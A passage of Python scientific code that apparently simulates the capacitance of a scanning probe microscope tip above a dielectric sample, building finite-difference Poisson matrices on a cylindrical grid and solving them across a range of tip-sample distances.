A[ind, irp] = -2 * Dr_minus * prefactor_r * eps_r # That's it, no radial derivative here...
elif j < (Nr - 1):
A[ind, irp] = -1 * Dr_minus * prefactor_r * eps_r - eps_r / (r0 * (Dr_plus+Dr_minus))
if i < (Ny-1):
A[ind, iyp] = -1 * Dy_minus * eps_p * prefactor_y
return sparse.csr_matrix(A) # Convert to better format for usage
def poisson_var_rad_samp_fast(r, y, eps_z):
Nr = len(r)
Ny = len(y)
hr = np.diff(r)
hy = np.diff(y)
# Define eps_z on the same grid as the voltage (eps_z uses the staggered grid)
eps_z_grid = np.r_[0.5+eps_z[0]*0.5, 0.5*(eps_z[1:]+eps_z[:-1]), 0.5+eps_z[-1]*0.5]
A = arrayBuilderInd()
for i in range(Ny):
for j in range(Nr): # Radial
ind = i * Nr + j # This point
irp = ind + 1 # +r
irn = ind - 1 # -r
iyp = (i+1)*Nr + j # +y
iyn = (i-1)*Nr + j # -y
Dr_plus = hr[j] if j < (Nr-1) else 0.0
Dr_minus = hr[j-1] if j > 0 else hr[j]
r0 = r[j]
eps_r = eps_z_grid[i] # Grab our estimate of eps_r at the grid boundary...
eps_p = eps_z[i] if i < (Ny-1) else 1.0
eps_m = eps_z[i-1] if i > 0 else 1.0
Dy_plus = hy[i] if i < (Ny-1) else 0.0
Dy_minus = hy[i-1] if i > 0 else 0.0
prefactor_r = 4/((Dr_plus+Dr_minus)*(Dr_plus**2 + Dr_minus**2))
# This is different I think...
# At the boundary, we need a different approximation...
if (i > 0) and i < (Ny-1):
prefactor_y = 2/((Dy_plus+Dy_minus) * Dy_minus * Dy_plus)
else:
prefactor_y = 4/((Dy_plus+Dy_minus)*(Dy_plus**2 + Dy_minus**2))
# Smallest index first...
if i > 0:
A[ind, iyn] = -1 * Dy_plus * eps_m * prefactor_y
# Second index...
if j > 0:
A[ind, irn] = -eps_r * Dr_plus * prefactor_r + eps_r / (r0 * (Dr_plus+Dr_minus))
# On the diagonal next...
A[ind, ind] = (Dr_plus+Dr_minus) * prefactor_r * eps_r + (eps_m*Dy_plus+eps_p*Dy_minus) * prefactor_y
if j == (Nr - 1):
A[ind, ind] = -eps_r / (r0 * (Dr_plus+Dr_minus)) # 1st order difference uses the grid point here...
if j == 0:
A[ind, irp] = -2 * Dr_minus * prefactor_r * eps_r # That's it, no radial derivative here...
elif j < (Nr - 1):
A[ind, irp] = -1 * Dr_minus * prefactor_r * eps_r - eps_r / (r0 * (Dr_plus+Dr_minus))
if i < (Ny-1):
A[ind, iyp] = -1 * Dy_minus * eps_p * prefactor_y
return sparse.csr_matrix(sparse.coo_matrix((A.data, (A.rows, A.cols)), shape=(Nr*Ny, Nr*Ny))) # Convert to better format for usage
def _poisson_var_rad_samp_fast(r, y, eps_z):
Nr = len(r)
Ny = len(y)
hr = np.diff(r)
hy = np.diff(y)
# Define eps_z on the same grid as the voltage (eps_z uses the staggered grid)
eps_z_grid = np.r_[0.5+eps_z[0]*0.5, 0.5*(eps_z[1:]+eps_z[:-1]), 0.5+eps_z[-1]*0.5]
A = arrayBuilderInd()
for i in range(Ny):
for j in range(Nr): # Radial
ind = i * Nr + j # This point
irp = ind + 1 # +r
irn = ind - 1 # -r
iyp = (i+1)*Nr + j # +y
iyn = (i-1)*Nr + j # -y
Dr_plus = hr[j] if j < (Nr-1) else 0.0
Dr_minus = hr[j-1] if j > 0 else hr[j]
r0 = r[j]
eps_r = eps_z_grid[i] # Grab our estimate of eps_r at the grid boundary...
eps_p = eps_z[i] if i < (Ny-1) else 1.0
eps_m = eps_z[i-1] if i > 0 else 1.0
Dy_plus = hy[i] if i < (Ny-1) else 0.0
Dy_minus = hy[i-1] if i > 0 else 0.0
prefactor_r = 4/((Dr_plus+Dr_minus)*(Dr_plus**2 + Dr_minus**2))
# This is different I think...
# At the boundary, we need a different approximation...
if (i > 0) and i < (Ny-1):
prefactor_y = 2/((Dy_plus+Dy_minus) * Dy_minus * Dy_plus)
else:
prefactor_y = 4/((Dy_plus+Dy_minus)*(Dy_plus**2 + Dy_minus**2))
# Smallest index first...
if i > 0:
A[ind, iyn] = -1 * Dy_plus * eps_m * prefactor_y
# Second index...
if j > 0:
A[ind, irn] = -eps_r * Dr_plus * prefactor_r + eps_r / (r0 * (Dr_plus+Dr_minus))
# On the diagonal next...
A[ind, ind] = (Dr_plus+Dr_minus) * prefactor_r * eps_r + (eps_m*Dy_plus+eps_p*Dy_minus) * prefactor_y
if j == (Nr - 1):
A[ind, ind] = -eps_r / (r0 * (Dr_plus+Dr_minus)) # 1st order difference uses the grid point here...
if j == 0:
A[ind, irp] = -2 * Dr_minus * prefactor_r * eps_r # That's it, no radial derivative here...
elif j < (Nr - 1):
A[ind, irp] = -1 * Dr_minus * prefactor_r * eps_r - eps_r / (r0 * (Dr_plus+Dr_minus))
if i < (Ny-1):
A[ind, iyp] = -1 * Dy_minus * eps_p * prefactor_y
return A
def _poisson_finish(r, y, eps_z, A_old, params):
N_samp = int(np.round(params.d/params.h0))
i_max = (params.Nz_plus + N_samp - 1)
ind = (i_max) * params.Nr # Use this as the cutoff..
imax = np.argmax(np.array(A_old.rows) >= ind)
s = slice(imax)
A = arrayBuilderInd()
A.rows = copy.copy(A_old.rows[s])
A.cols = copy.copy(A_old.cols[s])
A.data = copy.copy(A_old.data[s])
Nr = len(r)
Ny = len(y)
hr = np.diff(r)
hy = np.diff(y)
# Define eps_z on the same grid as the voltage (eps_z uses the staggered grid)
eps_z_grid = np.r_[0.5+eps_z[0]*0.5, 0.5*(eps_z[1:]+eps_z[:-1]), 0.5+eps_z[-1]*0.5]
for i in range(i_max, Ny): # Start near the bottom of the gap region...
for j in range(Nr): # Radial
ind = i * Nr + j # This point
irp = ind + 1 # +r
irn = ind - 1 # -r
iyp = (i+1)*Nr + j # +y
iyn = (i-1)*Nr + j # -y
Dr_plus = hr[j] if j < (Nr-1) else 0.0
Dr_minus = hr[j-1] if j > 0 else hr[j]
r0 = r[j]
eps_r = eps_z_grid[i] # Grab our estimate of eps_r at the grid boundary...
eps_p = eps_z[i] if i < (Ny-1) else 1.0
eps_m = eps_z[i-1] if i > 0 else 1.0
Dy_plus = hy[i] if i < (Ny-1) else 0.0
Dy_minus = hy[i-1] if i > 0 else 0.0
prefactor_r = 4/((Dr_plus+Dr_minus)*(Dr_plus**2 + Dr_minus**2))
# This is different I think...
# At the boundary, we need a different approximation...
if (i > 0) and i < (Ny-1):
prefactor_y = 2/((Dy_plus+Dy_minus) * Dy_minus * Dy_plus)
else:
prefactor_y = 4/((Dy_plus+Dy_minus)*(Dy_plus**2 + Dy_minus**2))
# Smallest index first...
if i > 0:
A[ind, iyn] = -1 * Dy_plus * eps_m * prefactor_y
# Second index...
if j > 0:
A[ind, irn] = -eps_r * Dr_plus * prefactor_r + eps_r / (r0 * (Dr_plus+Dr_minus))
# On the diagonal next...
A[ind, ind] = (Dr_plus+Dr_minus) * prefactor_r * eps_r + (eps_m*Dy_plus+eps_p*Dy_minus) * prefactor_y
if j == (Nr - 1):
A[ind, ind] = -eps_r / (r0 * (Dr_plus+Dr_minus)) # 1st order difference uses the grid point here...
if j == 0:
A[ind, irp] = -2 * Dr_minus * prefactor_r * eps_r # That's it, no radial derivative here...
elif j < (Nr - 1):
A[ind, irp] = -1 * Dr_minus * prefactor_r * eps_r - eps_r / (r0 * (Dr_plus+Dr_minus))
if i < (Ny-1):
A[ind, iyp] = -1 * Dy_minus * eps_p * prefactor_y
return A
class arrayBuilder:
def __init__(self, estimated_size=None):
self.rows = []
self.cols = []
self.data = []
def __call__(self, row, col, val):
self.rows.append(row)
self.cols.append(col)
self.data.append(val)
class arrayBuilderInd:
def __init__(self, estimated_size=None):
self.rows = []
self.cols = []
self.data = []
def __setitem__(self, rowcol, val):
self.rows.append(rowcol[0])
self.cols.append(rowcol[1])
self.data.append(val)
def to_csr(self, shape=None):
return sparse.csr_matrix(sparse.coo_matrix((self.data, (self.rows, self.cols)), shape=shape))
# Verified: the faster builder below produces the same matrix as poisson_variable_spacing_radial.
def poisson_variable_spacing_radial_faster(x, y):
Nx = len(x)
Ny = len(y)
hx = np.diff(x)
hy = np.diff(y)
ab = arrayBuilder()
for i in range(Ny):
for j in range(Nx): # Radial
ind = i * Nx + j # This point
ixp = ind + 1 # +x
ixn = ind - 1 # -x
# Goes last...
iyp = (i+1)*Nx + j # +y
# Goes first...
iyn = (i-1)*Nx + j # -y
Dx_plus = hx[j] if j < (Nx-1) else 0.0
Dx_minus = hx[j-1] if j > 0 else hx[j]
x0 = x[j]
Dy_plus = hy[i] if i < (Ny-1) else 0.0
Dy_minus = hy[i-1] if i > 0 else 0.0
prefactor_x = 4/((Dx_plus+Dx_minus)*(Dx_plus**2 + Dx_minus**2))
prefactor_y = 4/((Dy_plus+Dy_minus)*(Dy_plus**2 + Dy_minus**2))
dia_ind = (Dx_plus+Dx_minus) * prefactor_x + (Dy_plus+Dy_minus) * prefactor_y
if j == (Nx - 1):
dia_ind += -1 / (x0 * (Dx_plus+Dx_minus)) # 1st order difference uses the g
ab(ind, ind, dia_ind)
if j == 0:
ab(ind, ixp, -2 * Dx_minus * prefactor_x) # That's it, no radial derivative here...
elif j < (Nx - 1):
ab(ind, ixp, -1 * Dx_minus * prefactor_x + -1 / (x0 * (Dx_plus+Dx_minus)))
if j > 0:
ab(ind, ixn, -1 * Dx_plus * prefactor_x + 1 / (x0 * (Dx_plus+Dx_minus)))
if i > 0:
ab(ind, iyn, -1 * Dy_plus * prefactor_y)
if i < (Ny-1):
ab(ind, iyp, -1 * Dy_minus * prefactor_y)
return sparse.csr_matrix(sparse.coo_matrix((ab.data, (ab.rows, ab.cols)), shape=(Nx*Ny, Nx*Ny))) # Convert to better format for usage
def grid_area(r, z):
"""
Parameters:
r : 1d array of radii
z : 1d array of z coordinates
    Returns the volume of each annular grid cell (z in rows, r in columns); this is the
    volume element dV used in the energy integrals."""
    # Volume of each annular cell is π * (R_outer^2 - R_inner^2) * (Δz)
dr2 = np.diff(r**2)
return np.pi * np.diff(z).reshape((-1, 1)) @ dr2.reshape((1, -1))
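# Example (sanity-check sketch): on a uniform grid the cell volumes sum to the
# bounding cylinder volume, pi * r_max**2 * (z_max - z_min).
def _example_grid_area():
    r = np.linspace(0.0, 2.0, 5)
    z = np.linspace(0.0, 1.0, 3)
    dV = grid_area(r, z)  # shape (len(z) - 1, len(r) - 1)
    assert np.isclose(dV.sum(), np.pi * 2.0**2 * 1.0)
    return dV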
def E_field(u, r, z):
"""
u: Voltage on the grid (by convention, rows are z, columns are r)
r: 1D array of radii
z: 1D array of z coordinates
    Returns: the field components at the cell centers as a complex array, with the real
    part along r and the imaginary part along z.
    Works for r, z (cylindrical coordinates) or x, y (Cartesian coordinates)."""
Ny = len(z)
Nx = len(r)
Ey1 = np.diff(u.reshape((Ny, Nx)), axis=0) / np.diff(z).reshape((-1, 1))
Ex1 = np.diff(u.reshape((Ny, Nx)), axis=1) / np.diff(r).reshape((1, -1))
Ex = 0.5 * (Ex1[:-1, :] + Ex1[1:, :])
Ey = 0.5 * (Ey1[:, :-1] + Ey1[:, 1:])
return Ex + 1j*Ey
@dataclass
class Params:
Rtip : float = 20.0
theta_deg : float = 15.0
Hcone : float = 15000.0
Hcant : float = 500.0
Rcant : float = 15000.0
zMax : float = Rtip*1000.0
rhoMax : float = Rtip*1000.0
h0 : float = Rtip * 0.02
d : float = Rtip
Nuni : int = 50 # Uniformly spaced points in the r and z_plus directions
Nr : int = 500
Nz_plus : int = 500
hsam : float = 0.0 # No sample thickness for now...
@property
def theta(self) -> float:
return self.theta_deg * np.pi/180
@dataclass
class ParamsSample:
Rtip : float = 20.0
theta_deg : float = 15.0
Hcone : float = 15000.0
Hcant : float = 500.0
Rcant : float = 15000.0
zMax : float = Rtip*1000.0
rhoMax : float = Rtip*1000.0
h0 : float = Rtip * 0.02
d : float = Rtip
Nuni : int = 50 # Uniformly spaced points in the r and z_plus directions
Nr : int = 500
Nz_plus : int = 500
hsam : float = 1.0
eps_r : float = 3.0
equally_spaced_sample : bool = True
@property
def theta(self) -> float:
return self.theta_deg * np.pi/180
@dataclass
class AllParams:
dmin : float
dmax : float
istep : int
Rtip : float = 20.0
theta_deg : float = 15.0
Hcone : float = 15000.0
Hcant : float = 500.0
Rcant : float = 15000.0
zMax : float = Rtip*1000.0
rhoMax : float = Rtip*1000.0
h0 : float = Rtip * 0.02
Nuni : int = 50 # Uniformly spaced points in the r and z_plus directions
Nr : int = 500
Nz_plus : int = 500
hsam : float = 1.0
eps_r : float = 3.0
equally_spaced_sample : bool = True
pt : int = 0
@property
def theta(self) -> float:
return self.theta_deg * np.pi/180
@property
def Npts(self) -> int:
return int(np.round((self.dmax - self.dmin) / (self.h0 * self.istep)))+1
@property
def ds(self) -> np.array:
return self.dmin + np.arange(self.Npts) * self.istep * self.h0
@property
def d(self) -> float:
return self.ds[self.pt]
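# Example (illustrative values): with the default h0 = 0.4 nm, a sweep from
# dmin = 20 nm to dmax = 24 nm with istep = 5 advances in increments of
# istep * h0 = 2 nm, and advancing `pt` moves the current distance `d` along `ds`.
def _example_allparams_sweep():
    p = AllParams(dmin=20.0, dmax=24.0, istep=5)
    # p.Npts == 3, p.ds == array([20., 22., 24.]), and p.d == 20.0 while p.pt == 0
    return p.ds, p.d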
class CapSolAll:
def __init__(self, params: AllParams):
self.params = params
self.r, self.r_ratio = guni_grid(params.Nuni, params.Nr, params.h0, params.rhoMax)
self.z_plus, self.z_ratio = guni_grid(params.Nuni, params.Nz_plus,
params.h0, params.zMax)
self._setup_z_grid()
self._setup_grid_and_boundary()
def _setup_z_grid(self):
params = self.params
if params.equally_spaced_sample:
self.z_minus = generate_gapsam_grid(params.h0, params.hsam, params.d)
else:
raise ValueError("Non-equally spaced sample points not yet implemented.")
# Make the final, overall, z grid:
self.z = np.r_[self.z_minus, self.z_plus]
def _setup_grid_and_boundary(self):
params = self.params
self.eps_z = epsilon_z(self.z, self.params.d, self.params.eps_r)
self.R, self.Z = np.meshgrid(self.r, self.z)
self.spm_tip = (sphere(self.R, self.Z, self.params.Rtip) +
cone(self.R, self.Z, params.Rtip, params.theta, params.Hcone) +
body(self.R, self.Z, params.Hcone, params.Hcant, params.Rcant)
)
self.Nr = len(self.r)
self.Nz = len(self.z)
self.outer_boundary = boundary_radial(self.Nr, self.Nz)
self.boundary = self.spm_tip.ravel() + self.outer_boundary
self.u = np.zeros_like(self.R)
self.u[self.spm_tip] = 1.0
def setup_matrices_init(self):
self.A = poisson_var_rad_samp_fast(self.r, self.z, self.eps_z)
self.f = -self.A @ self.u.ravel()
self.A_free = self.A[~self.boundary].T[~self.boundary].T
self.f_free = self.f[~self.boundary]
def solve_init(self):
u_cut = la.spsolve(self.A_free, self.f_free)
self.u = self.u.ravel()
self.u[~self.boundary] = u_cut
self.u = self.u.reshape((self.Nz, self.Nr))
def solve_new(self, guess, solver=la.cgs):
u_cut, info = solver(self.A_free, self.f_free, guess)
# Check whether info is zero...
# print(info)
self.u = self.u.ravel()
self.u[~self.boundary] = u_cut
self.u = self.u.reshape((self.Nz, self.Nr))
def process(self):
self.dV = dV = grid_area(self.r, self.z)
self.energy = 0.5 * np.sum(dV * self.eps_z.reshape((-1, 1)) * abs(E_field(self.u, self.r, self.z))**2) * 1e-9 * 8.854e-12
self.energy_z = 0.5 * np.sum(dV * self.eps_z.reshape((-1, 1)) * E_field(self.u, self.r, self.z).imag**2) * 1e-9 * 8.854e-12
self.c=self.energy*2
return self.c # In SI Units...
def run(self, solver=la.bicgstab):
p = self.params
self.C = np.zeros_like(p.ds)
print(f"Stepping from {p.d} to {p.dmax} by {p.istep*p.h0} nm")
print(f"Total simulations: {p.Npts}")
for i, dist in enumerate(p.ds):
p = self.params
start_time = dt.now()
if i == 0:
self.setup_matrices_init()
end_setup_time = dt.now()
setup_time = end_setup_time - start_time
self.solve_init()
solve_time = dt.now() - end_setup_time
else:
# We need to setup the z grid again since the distance increased...
self._setup_z_grid()
# New meshgrid and boundary function
self._setup_grid_and_boundary()
self.setup_matrices_init()
end_setup_time = dt.now()
setup_time = end_setup_time - start_time
guess = np.r_[self.u[:p.istep], self.u_old]
# print(guess.shape)
# print(self.u.shape)
self.solve_new(guess=guess.ravel()[~self.boundary], solver=solver)
solve_time = dt.now() - end_setup_time
self.C[i] = self.process() # Save capacitance to array...
self.u_old = copy.copy(self.u)
print(f"{i+1}. d = {p.d} nm, tSetup = {setup_time.seconds/60:.2f} m, tSolve = {solve_time.seconds/60:.2f} m, C = {self.C[i]:.4e} F")
# print(self.params.d)
self.params.pt += 1
# print(self.params.d)
class CapSolAllRev:
def __init__(self, params: AllParams):
self.params = params
self.r, self.r_ratio = guni_grid(params.Nuni, params.Nr, params.h0, params.rhoMax)
self.z_plus, self.z_ratio = guni_grid(params.Nuni, params.Nz_plus,
params.h0, params.zMax)
self._setup_z_grid()
self._setup_grid_and_boundary()
def _setup_z_grid(self):
params = self.params
if params.equally_spaced_sample:
self.z_minus = generate_gapsam_grid(params.h0, params.hsam, params.d)
else:
raise ValueError("Non-equally spaced sample points not yet implemented.")
# Make the final, overall, z grid:
self.z = np.r_[self.z_minus, self.z_plus][::-1] # Reverse the z grid...
def _setup_grid_and_boundary(self):
params = self.params
self.eps_z = epsilon_z(self.z, self.params.d, self.params.eps_r)
self.R, self.Z = np.meshgrid(self.r, self.z)
self.spm_tip = (sphere(self.R, self.Z, self.params.Rtip) +
cone(self.R, self.Z, params.Rtip, params.theta, params.Hcone) +
body(self.R, self.Z, params.Hcone, params.Hcant, params.Rcant)
)
self.Nr = len(self.r)
self.Nz = len(self.z)
self.outer_boundary = boundary_radial(self.Nr, self.Nz)
self.boundary = self.spm_tip.ravel() + self.outer_boundary
self.u = np.zeros_like(self.R)
self.u[self.spm_tip] = 1.0
def setup_matrices_init(self):
self.Ab = _poisson_var_rad_samp_fast(self.r, self.z, self.eps_z)
self.A = self.Ab.to_csr(shape=(self.Nr*self.Nz, self.Nr * self.Nz))
self._apply_boundaries()
def setup_matrices_new(self):
# r, z need to have been updated by _setup_grid_and_boundary...
self.Ab = _poisson_finish(self.r, self.z, self.eps_z, self.Ab, self.params_old)
self.A = self.Ab.to_csr(shape=(self.Nr*self.Nz, self.Nr * self.Nz))
self._apply_boundaries()
def _apply_boundaries(self):
self.f = -self.A @ self.u.ravel()
self.A_free = self.A[~self.boundary].T[~self.boundary].T
self.f_free = self.f[~self.boundary]
def solve_init(self):
u_cut = la.spsolve(self.A_free, self.f_free)
self.u = self.u.ravel()
self.u[~self.boundary] = u_cut
self.u = self.u.reshape((self.Nz, self.Nr))
def solve_new(self, guess, solver=la.cgs):
u_cut, info = solver(self.A_free, self.f_free, guess)
# Check whether info is zero...
# print(info)
self.u = self.u.ravel()
self.u[~self.boundary] = u_cut
self.u = self.u.reshape((self.Nz, self.Nr))
def process(self):
self.dV = dV = grid_area(self.r, self.z)
self.energy = 0.5 * np.sum(dV * self.eps_z.reshape((-1, 1)) * abs(E_field(self.u, self.r, self.z))**2) * 1e-9 * 8.854e-12
self.energy_z = 0.5 * np.sum(dV * self.eps_z.reshape((-1, 1)) * E_field(self.u, self.r, self.z).imag**2) * 1e-9 * 8.854e-12
self.c=self.energy*2
return self.c # In SI Units...
def run(self, solver=la.bicgstab):
p = self.params
self.C = np.zeros_like(p.ds)
print(f"Stepping from {p.d} to {p.dmax} by {p.istep*p.h0} nm")
print(f"Total simulations: {p.Npts}")
for i, dist in enumerate(p.ds):
p = self.params
start_time = dt.now()
if i == 0:
self.setup_matrices_init()
end_setup_time = dt.now()
setup_time = end_setup_time - start_time
self.solve_init()
solve_time = dt.now() - end_setup_time
else:
# We need to setup the z grid again since the distance increased...
self._setup_z_grid()
# New meshgrid and boundary function
self._setup_grid_and_boundary()
self.setup_matrices_new()
end_setup_time = dt.now()
setup_time = end_setup_time - start_time
guess = np.r_[self.u[:p.istep], self.u_old]
# print(guess.shape)
# print(self.u.shape)
self.solve_new(guess=guess.ravel()[~self.boundary], solver=solver)
solve_time = dt.now() - end_setup_time
self.C[i] = self.process() # Save capacitance to array...
self.params_old = copy.copy(self.params)
self.u_old = copy.copy(self.u)
print(f"{i+1}. d = {p.d} nm, tSetup = {setup_time.seconds/60:.2f} m, tSolve = {solve_time.seconds/60:.2f} m, C = {self.C[i]:.4e} F")
# print(self.params.d)
self.params.pt += 1
# print(self.params.d)
class CapSol:
def __init__(self, params: Params):
self.params = params
self.r, self.r_ratio = guni_grid(params.Nuni, params.Nr, params.h0, params.rhoMax)
self.z_plus, self.z_ratio = guni_grid(params.Nuni, params.Nz_plus,
params.h0, params.zMax)
self.z_minus = generate_gapsam_grid(params.h0, params.hsam, params.d)
# Make the final, overall, z grid:
self.z = np.r_[self.z_minus, self.z_plus]
self.R, self.Z = np.meshgrid(self.r, self.z)
self.spm_tip = (sphere(self.R, self.Z, self.params.Rtip) +
cone(self.R, self.Z, params.Rtip, params.theta, params.Hcone) +
body(self.R, self.Z, params.Hcone, params.Hcant, params.Rcant)
)
self.Nr = len(self.r)
self.Nz = len(self.z)
self.outer_boundary = boundary_radial(self.Nr, self.Nz)
self.boundary = self.spm_tip.ravel() + self.outer_boundary
self.u = np.zeros_like(self.R)
self.u[self.spm_tip] = 1.0
def setup_matrices(self):
self.A = poisson_variable_spacing_radial(self.r, self.z)
self.f = -self.A @ self.u.ravel()
self.A_free = self.A[~self.boundary].T[~self.boundary].T
self.f_free = self.f[~self.boundary]
def solve(self):
u_cut = la.spsolve(self.A_free, self.f_free)
self.u = self.u.ravel()
self.u[~self.boundary] = u_cut
self.u = self.u.reshape((self.Nz, self.Nr))
def process(self):
self.dV = dV = grid_area(self.r, self.z)
self.energy = 0.5 * np.sum(dV * abs(E_field(self.u, self.r, self.z))**2) * 1e-9 * 8.854e-12
self.energy_z = 0.5 * np.sum(dV * E_field(self.u, self.r, self.z).imag**2) * 1e-9 * 8.854e-12
self.c=self.energy*2
return self.c # In SI Units...
def run(self):
print("Grids:")
print(f"r_ratio = {self.r_ratio:.3f}, z_ratio = {self.z_ratio:.3f}")
print("Setting up matrices:")
self.setup_matrices()
print("Solving...")
self.solve()
self.process()
print(f"C = {self.c:.5e} F")
print("Done!")
def __repr__(self):
return f"CapSol(params={repr(self.params)})"
class CapSolSample:
def __init__(self, params: ParamsSample):
self.params = params
self.r, self.r_ratio = guni_grid(params.Nuni, params.Nr, params.h0, params.rhoMax)
self.z_plus, self.z_ratio = guni_grid(params.Nuni, params.Nz_plus,
params.h0, params.zMax)
if params.equally_spaced_sample:
self.z_minus = generate_gapsam_grid(params.h0, params.hsam, params.d)
else:
raise ValueError("Non-equally spaced sample points not yet implemented.")
# Make the final, overall, z grid:
self.z = np.r_[self.z_minus, self.z_plus]
self._setup_grid_and_boundary()
def _setup_grid_and_boundary(self):
params = self.params
self.eps_z = epsilon_z(self.z, self.params.d, self.params.eps_r)
self.R, self.Z = np.meshgrid(self.r, self.z)
self.spm_tip = (sphere(self.R, self.Z, self.params.Rtip) +
cone(self.R, self.Z, params.Rtip, params.theta, params.Hcone) +
body(self.R, self.Z, params.Hcone, params.Hcant, params.Rcant)
)
self.Nr = len(self.r)
self.Nz = len(self.z)
self.outer_boundary = boundary_radial(self.Nr, self.Nz)
self.boundary = self.spm_tip.ravel() + self.outer_boundary
self.u = np.zeros_like(self.R)
self.u[self.spm_tip] = 1.0
def setup_matrices(self):
self.A = poisson_var_rad_samp_fast(self.r, self.z, self.eps_z)
self.f = -self.A @ self.u.ravel()
self.A_free = self.A[~self.boundary].T[~self.boundary].T
self.f_free = self.f[~self.boundary]
def solve(self):
u_cut = la.spsolve(self.A_free, self.f_free)
self.u = self.u.ravel()
self.u[~self.boundary] = u_cut
self.u = self.u.reshape((self.Nz, self.Nr))
def process(self):
self.dV = dV = grid_area(self.r, self.z)
self.energy = 0.5 * np.sum(dV * self.eps_z.reshape((-1, 1)) * abs(E_field(self.u, self.r, self.z))**2) * 1e-9 * 8.854e-12
self.energy_z = 0.5 * np.sum(dV * self.eps_z.reshape((-1, 1)) * E_field(self.u, self.r, self.z).imag**2) * 1e-9 * 8.854e-12
self.c=self.energy*2
return self.c # In SI Units...
def run(self):
print("Grids:")
print(f"r_ratio = {self.r_ratio:.3f}, z_ratio = {self.z_ratio:.3f}")
print("Setting up matrices:")
self.setup_matrices()
print("Solving...")
self.solve()
self.process()
print(f"C = {self.c:.5e} F")
print("Done!")
def __repr__(self):
return f"CapSolSample(params={repr(self.params)})"
class SphereTest:
def __init__(self, params: Params):
self.params = params
self.r, self.r_ratio = guni_grid(params.Nuni, params.Nr, params.h0, params.rhoMax)
self.z_plus, self.z_ratio = guni_grid(params.Nuni, params.Nz_plus,
params.h0, params.zMax)
self.z_minus = generate_gapsam_grid(params.h0, params.hsam, params.d)
# Make the final, overall, z grid:
self.z = np.r_[self.z_minus, self.z_plus]
self.R, self.Z = np.meshgrid(self.r, self.z)
self.spm_tip = sphere(self.R, self.Z, self.params.Rtip)
self.Nr = len(self.r)
self.Nz = len(self.z)
self.outer_boundary = boundary_radial(self.Nr, self.Nz)
self.boundary = self.spm_tip.ravel() + self.outer_boundary
self.u = np.zeros_like(self.R)
self.u[self.spm_tip] = 1.0
def setup_matrices(self):
self.A = poisson_variable_spacing_radial(self.r, self.z)
self.f = -self.A @ self.u.ravel()
self.A_free = self.A[~self.boundary].T[~self.boundary].T
self.f_free = self.f[~self.boundary]
def solve(self):
u_cut = la.spsolve(self.A_free, self.f_free)
self.u = self.u.ravel()
self.u[~self.boundary] = u_cut
self.u = self.u.reshape((self.Nz, self.Nr))
def process(self):
self.dV = dV = grid_area(self.r, self.z)
self.energy = 0.5 * np.sum(dV * abs(E_field(self.u, self.r, self.z))**2) * 1e-9 * 8.854e-12
self.energy_z = 0.5 * np.sum(dV * E_field(self.u, self.r, self.z).imag**2) * 1e-9 * 8.854e-12
self.c=self.energy*2
return self.c # In SI Units...
def run(self):
start_time = dt.now()
print("Grids:")
print(f"r_ratio = {self.r_ratio:.4f}, z_ratio = {self.z_ratio:.4f}")
print("Setting up matrices:")
self.setup_matrices()
now = dt.now()
print(f"Matrices set up in {now - start_time}")
print("Solving...")
self.solve()
print(f"Solved in {dt.now() - now}")
self.process()
print(f"C = {self.c:.5e} F")
print(f"Done! Total time: {dt.now() - start_time}")
def __repr__(self):
return f"CapSol(params={repr(self.params)})"
class SphereTestSample:
def __init__(self, params: ParamsSample):
self.params = params
self.r, self.r_ratio = guni_grid(params.Nuni, params.Nr, params.h0, params.rhoMax)
self.z_plus, self.z_ratio = guni_grid(params.Nuni, params.Nz_plus,
params.h0, params.zMax)
if params.equally_spaced_sample:
self.z_minus = generate_gapsam_grid(params.h0, params.hsam, params.d)
else:
raise ValueError("Non-equally spaced sample points not yet implemented.")
# Make the final, overall, z grid:
self.z = np.r_[self.z_minus, self.z_plus]
self._setup_grid_and_boundary()
def _setup_grid_and_boundary(self):
params = self.params
self.eps_z = epsilon_z(self.z, self.params.d, self.params.eps_r)
self.R, self.Z = np.meshgrid(self.r, self.z)
self.spm_tip = sphere(self.R, self.Z, self.params.Rtip)
self.Nr = len(self.r)
self.Nz = len(self.z)
self.outer_boundary = boundary_radial(self.Nr, self.Nz)
self.boundary = self.spm_tip.ravel() + self.outer_boundary
self.u = np.zeros_like(self.R)
self.u[self.spm_tip] = 1.0
def setup_matrices(self):
self.A = poisson_var_rad_samp_fast(self.r, self.z, self.eps_z)
self.f = -self.A @ self.u.ravel()
self.A_free = self.A[~self.boundary].T[~self.boundary].T
self.f_free = self.f[~self.boundary]
def solve(self):
u_cut = la.spsolve(self.A_free, self.f_free)
self.u = self.u.ravel()
self.u[~self.boundary] = u_cut
self.u = self.u.reshape((self.Nz, self.Nr))
def process(self):
self.dV = dV = grid_area(self.r, self.z)
self.energy = 0.5 * np.sum(dV * self.eps_z.reshape((-1, 1)) * abs(E_field(self.u, self.r, self.z))**2) * 1e-9 * 8.854e-12
self.energy_z = 0.5 * np.sum(dV * self.eps_z.reshape((-1, 1)) * E_field(self.u, self.r, self.z).imag**2) * 1e-9 * 8.854e-12
self.c=self.energy*2
return self.c # In SI Units...
def run(self):
start_time = dt.now()
print("Grids:")
print(f"r_ratio = {self.r_ratio:.4f}, z_ratio = {self.z_ratio:.4f}")
print("Setting up matrices:")
self.setup_matrices()
now = dt.now()
print(f"Matrices set up in {now - start_time}")
print("Solving...")
self.solve()
print(f"Solved in {dt.now() - now}")
self.process()
print(f"C = {self.c:.5e} F")
print(f"Done! Total time: {dt.now() - start_time}")
def __repr__(self):
return f"CapSol(params={repr(self.params)})"
def Totalsim(params, dmin, dmax, istep, fname, Test=0):
capacitances=[]
distances=np.arange(dmin, dmax, istep*params.h0)
print(distances)
for i, d in tqdm(enumerate(distances), total=len(distances)):
start_time= dt.now()
params.d = d
print(f"Distance {d} nm ({i}/{len(distances)})")
if Test==1:
sim=SphereTestSample(params)
else:
sim=CapSolSample(params)
sim.run()
capacitances.append(sim.c)
end_time=dt.now()
elapsed_time= end_time-start_time
print(elapsed_time)
np.savetxt(fname, np.c_[distances, capacitances], header='distance (nm) Capacitances(F)',
footer=f'Totalsim(params={params}, dmin={dmin}, dmax={dmax}, istep={istep}, fname={fname}, Test={Test})')
return distances, capacitances
def runnewcapsol(input_fname= "capsol.in", output_fname="C-Z.dat"):
gp=nac.get_gridparameters(input_fname)
params=ParamsSample(Rtip=gp["Rtip"], theta_deg=gp["half-angle"],
Hcone=gp["HCone"], Hcant=gp["thickness_Cantilever"],
Rcant=gp["RCantilever"], zMax=gp["z_max"], rhoMax=gp["rho_max"],
h0=gp["h0"], d=gp["min"], Nuni=gp["Nuni"], Nr=gp["n"],
Nz_plus=gp["m+"],hsam=gp["Thickness_sample"],
